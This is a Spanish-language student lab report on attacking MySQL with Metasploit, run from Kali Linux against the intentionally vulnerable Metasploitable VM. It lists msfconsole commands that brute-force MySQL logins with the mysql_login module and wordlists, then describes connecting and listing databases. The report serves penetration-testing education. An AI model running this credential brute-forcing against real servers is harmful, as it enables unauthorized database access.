UNIVERSIDAD DE LA SIERRA SUR

Prctica Tercer Parcial

Ataque a Mysql

Luis Angel
18/06/2014




Atacar Mysql con Metasploit
Prctica realizada con la mquina Metasploitable y Kali Linux, en este casp Metasploitable ya viene
configurado con vulnerabilidades para llevar a cabo prcticas de penetracin. A continuacin se
describirn cules fueron los pasos que se realizaron para llevar a cabo esta prctica.
1. Instalacin de las mquinas virtuales, se debern instalar una mquina virtual para Kali
Linux y Metasplotable.
2. Una vez instaladas se deber poder hacer ping desde cada una de las mquinas.
3. En nuestro Kali abrimos una terminal y tecleamos
#msfconsole
A continuacin ya estaremos en la consola del Metasploit que trae kali integrado.
4. Tecleamos los siguientes comandos
# msfconsole
msf > search mysql
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
msf auxiliary(mysql_login) > set RHOSTS [IP_Objetivo]
msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit
framework/data/wordlists/unix_users.txt
msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploitframework/
data/wordlists/unix_passwords.txt
msf auxiliary(mysql_login) >exploit
En donde IP_Objetivo ser la direccin IP de la mquina virtual en la que fue instalado
Metasploitable. Una vez puesto el ltimo comando se conectar al host remoto y
comenzar a buscar las contraseas en el servidor mysql.

Cuando el escaneo encuentra un usuario y contrasea vlido se mostrar un cono verde en la
parte izquierda de la consola.

Una vez encontrado un usuario vlido procederemos a conectar remotamente con la base de
datos de la siguiente manera.


Ya dentro de la consola de mysql podemos hacer uso de los comandos de mysql como por
ejemplo:
Mostrar las bases de datos que se encuentran en mysql.
Show databases
Hacer uso de una base de datos en especial
Use database_name